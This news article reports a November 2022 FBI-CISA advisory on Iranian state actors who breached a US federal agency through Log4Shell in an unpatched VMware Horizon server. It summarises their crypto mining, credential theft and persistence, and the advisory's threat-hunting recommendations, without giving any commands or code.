Iranian nation-state threat actors breached a Federal agency’s network before deploying malware, including a credential harvester and a cryptocurrency miner, according to a joint advisory released on Nov. 16, by the Federal Bureau of Investigations (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA).
According to the advisory, CISA conducted an incident response engagement from mid-June through mid-July 2022 at a Federal Civilian Executive Branch organization where it observed suspicious activity. CISA and the FBI assessed the Federal agency’s network was compromised by Iranian nation-state threat actors.
During a Senate Homeland Security and Governmental Affairs Committee hearing on Nov. 17, Secretary of Homeland Security Alejandro Mayorkas explained that he believes this is being classified as “a major incident.”
CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server. After the threat actors gained access, they “installed XMRig crypto mining software, moved laterally to the domain controller, compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence in the network.”
Once in the network, threat actors were utilizing remote desktop protocol and a built-in default Windows user account to move across the agency’s network. They were also using a command in PowerShell that allowed threat actors to download software without activating the virus scanner.
CISA and FBI believe the threat actors compromised the network as early as February 2022, and incident response was conducted after Einstein – a Federal civilian agency-wide intrusion detection system operated by CISA – detected signs of the threat activity in April.
All organizations with affected VMware systems that did not immediately apply available patches or workarounds should assume their networks have been compromised and initiate threat hunting activities, CISA and FBI noted in the advisory.
“If suspected initial access or compromise is detected … CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems, and audit privileged accounts,” the advisory stated.